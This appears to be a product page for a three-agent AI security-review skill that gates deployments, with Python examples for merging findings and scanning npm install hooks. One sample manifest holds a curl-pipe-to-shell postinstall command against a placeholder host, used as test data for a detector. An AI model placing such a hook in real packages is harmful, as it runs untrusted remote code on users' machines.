
Security Team

Spawn a 3-agent security review team (Static Analyzer + Dependency Auditor + Threat Modeler) for pre-deploy security gates.

How It Works

Security Team · Workflow
Three security lanes in parallel, then a PASS/FAIL deploy gate.

Trigger: Security review / pre-deploy · Threat model, dependency audit, or pre-deploy gate

  1. Scope the surface: Changed files · critical paths · stack & packages
  2. Spawn 3 agents (parallel; faster than a full audit swarm)
    • Static Analyzer: OWASP Top 10 · secrets · injection — fixes P0
    • Dependency Auditor: npm/pip audit · CVEs · upgrade paths
    • Threat Modeler: Attack surface · STRIDE · trust boundaries
  3. Triage and act: Merge by severity · resolve P0s · open CVE upgrade PRs
  4. Security gate: P0s resolved · 0 Critical CVEs · threat model committed
    • FAIL — surface unresolved risk to Knox

Review + threat-model.md: Findings by severity · mitigations · docs/security/threat-model.md

Invocation Triggers

  • /security-team
  • security review
  • threat model
  • dependency audit
  • pre-deploy security

Use Cases

  • Pre-deploy security gate before launching a new service
  • Dependency audit for a third-party package adoption
  • Threat model a new authentication or payment flow

The Problem

Solo security reviews scan for the thing you happened to remember to look for. You grep for secrets, glance at npm audit, and call it clean — while the IDOR in the auth flow and the abandoned dependency fetching remote code at install time both sail through. A pre-deploy gate that only catches what one tired engineer thought of at 6pm is not a gate. It is a feeling.

What It Does

  1. Define the scope

    Identify the changed surface (git diff main...HEAD), the critical paths (auth, payments, data access, external calls), and the stack. Scope is agreed explicitly, not assumed — changed files can still call unchanged vulnerable code.

  2. Spawn all 3 agents in parallel

    Static Analyzer (sonnet) hunts OWASP Top 10, secrets, and unsanitized sinks. Dependency Auditor (sonnet) runs npm/pip/cargo audit and assesses real exploitability. Threat Modeler (opus) maps the attack surface and runs STRIDE on the critical flows.

  3. Static analysis with P0 self-fix

    The Static Analyzer scans for injection, broken auth, XSS, IDOR, hardcoded keys, dangerouslySetInnerHTML without sanitization, and string-built SQL. Actively exploitable P0s get fixed inline; P1/P2 are documented with file:line and remediation.

  4. Dependency and CVE audit

    Critical and High CVEs get researched for actual exploitability in this codebase — not just a raw audit dump. Abandoned packages and remote-fetching installers are flagged separately, because they never show up in npm audit output.

  5. Threat model and persist

    The Threat Modeler maps entry points and trust boundaries, ranks the highest-risk paths, and writes the model to docs/security/threat-model.md. An in-context report that never gets committed is lost on the next session.

  6. Triage and gate

    Findings merge by severity. P0s resolve immediately, Critical/High CVEs get upgrade PRs, and the gate prints PASS or FAIL with explicit counts. Identified risks with no mitigation are never a PASS.
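
The triage-and-gate step above can be expressed as a small evaluator. This is an added example, not code from the skill itself; the `Finding` fields, lane names and gate-line format are assumptions, and the sample findings are constructed.

```python
from collections import Counter
from dataclasses import dataclass

RANK = {"P0": 0, "P1": 1, "P2": 2}

@dataclass(frozen=True)
class Finding:
    lane: str               # "static", "deps" or "threat" (assumed lane names)
    severity: str           # "P0", "P1" or "P2"
    location: str           # file:line, package name, or flow name
    title: str
    resolved: bool = False      # fix or upgrade has landed
    critical_cve: bool = False  # deps lane only
    mitigated: bool = False     # threat lane: mitigation implemented
    accepted_by: str = ""       # threat lane: who signed off on the risk

def merge_findings(*lanes):
    """Merge lane outputs, keep the most severe copy of a duplicate, sort by severity."""
    merged = {}
    for finding in (f for lane in lanes for f in lane):
        key = (finding.location, finding.title)
        if key not in merged or RANK[finding.severity] < RANK[merged[key].severity]:
            merged[key] = finding
    return sorted(merged.values(), key=lambda f: (RANK[f.severity], f.location))

def evaluate_gate(findings, threat_model_committed):
    """Return (passed, gate_line): no open P0, no open Critical CVE, model committed,
    and no threat-model risk left without a mitigation or a sign-off."""
    open_items = [f for f in findings if f.lane != "threat" and not f.resolved]
    counts = Counter(f.severity for f in open_items)
    critical = sum(f.critical_cve for f in open_items)
    unmitigated = sum(1 for f in findings
                      if f.lane == "threat" and not (f.mitigated or f.accepted_by))
    passed = (counts["P0"] == 0 and critical == 0
              and threat_model_committed and unmitigated == 0)
    line = (f"{'PASS' if passed else 'FAIL'} P0={counts['P0']} P1={counts['P1']} "
            f"critical_cves={critical} unmitigated_risks={unmitigated}")
    return passed, line

# Constructed sample findings, not output from a real run.
STATIC = [Finding("static", "P0", "api/orders.py:41", "string-built SQL", resolved=True),
          Finding("static", "P1", "web/Profile.jsx:12", "unsanitized dangerouslySetInnerHTML")]
DEPS = [Finding("deps", "P1", "example-abandoned-pkg", "abandoned package")]
THREAT = [Finding("threat", "P1", "password reset flow", "token replay")]

if __name__ == "__main__":
    print(evaluate_gate(merge_findings(STATIC, DEPS, THREAT), threat_model_committed=True)[1])
```

With the sample data the gate fails even though the only P0 is fixed, because the threat-model risk has neither a mitigation nor a sign-off.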

What You Get / What It Doesn't Do

What you get
  • Severity-merged findings table with file:line and remediation per item
  • P0 vulnerabilities fixed inline, each with a regression test
  • CVE upgrade PRs for Critical and High dependencies
  • A committed docs/security/threat-model.md with the ranked attack surface
  • A PASS/FAIL gate line with explicit P0, P1, and CVE counts
What it doesn't do
  • Accept an identified risk without your explicit sign-off
  • Replace a full audit swarm — this is security-only, by design
  • Auto-merge dependency upgrade PRs — you review the version bumps
  • Guarantee zero vulnerabilities — it covers known patterns and CVEs, not unknowns

Tips

Verify the self-fixed P0s

An agent fixing its own work is not an independent check. Run the test suite after any Static Analyzer P0 fix and confirm a regression test exists.

npm audit is not the whole audit

A clean audit only means no known CVEs. The abandoned package and the install-time remote fetch never appear there — that is exactly what the Dependency Auditor exists to catch.
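
One check that covers the install-time remote fetch, as an added example rather than the skill's own code: list every installed package that declares an npm install hook and mark the ones whose command contains a fetch marker. The marker regex is a heuristic assumption, and the sample manifests and URL are constructed placeholders.

```python
import json
import re
from pathlib import Path

# npm lifecycle hooks that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Heuristic markers of a network fetch in a hook command (assumed list; extend for your stack).
FETCH_MARKERS = re.compile(r"\b(curl|wget)\b|https?://", re.IGNORECASE)

def audit_manifest(manifest):
    """Return (hook, command, fetches_remote) for each install-time hook in one package.json."""
    scripts = manifest.get("scripts")
    if not isinstance(scripts, dict):
        return []
    return [(hook, scripts[hook], bool(FETCH_MARKERS.search(scripts[hook])))
            for hook in INSTALL_HOOKS if isinstance(scripts.get(hook), str)]

def scan_node_modules(root):
    """Walk an installed tree and list every package that declares an install-time hook."""
    report = []
    for path in sorted(Path(root).rglob("package.json")):
        try:
            manifest = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: nothing to evaluate
        if isinstance(manifest, dict):
            name = manifest.get("name", path.parent.name)
            report += [{"package": name, "hook": h, "command": c, "remote_fetch": r}
                       for h, c, r in audit_manifest(manifest)]
    return report

# Constructed manifests for illustration; the package names and URL are placeholders.
SAMPLE_REMOTE = {"name": "example-installer",
                 "scripts": {"postinstall": "curl -s https://downloads.example.invalid/setup.sh | sh"}}
SAMPLE_LOCAL = {"name": "example-native", "scripts": {"install": "node-gyp rebuild", "test": "jest"}}

if __name__ == "__main__":
    for finding in scan_node_modules("node_modules"):
        print(finding)
```

Hooks without a fetch marker are still reported, since a hook can invoke a script file that does the download; those need a manual look at the script itself.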

A model with no mitigations is not a PASS

The Threat Modeler listing risks is half the job. Either implement the mitigation or formally accept the risk with sign-off before you call the gate green.

Get the Skill

Elite Skill

Unlock the full Security Team SKILL.md — drop it into ~/.claude/skills/ and trigger it by name.
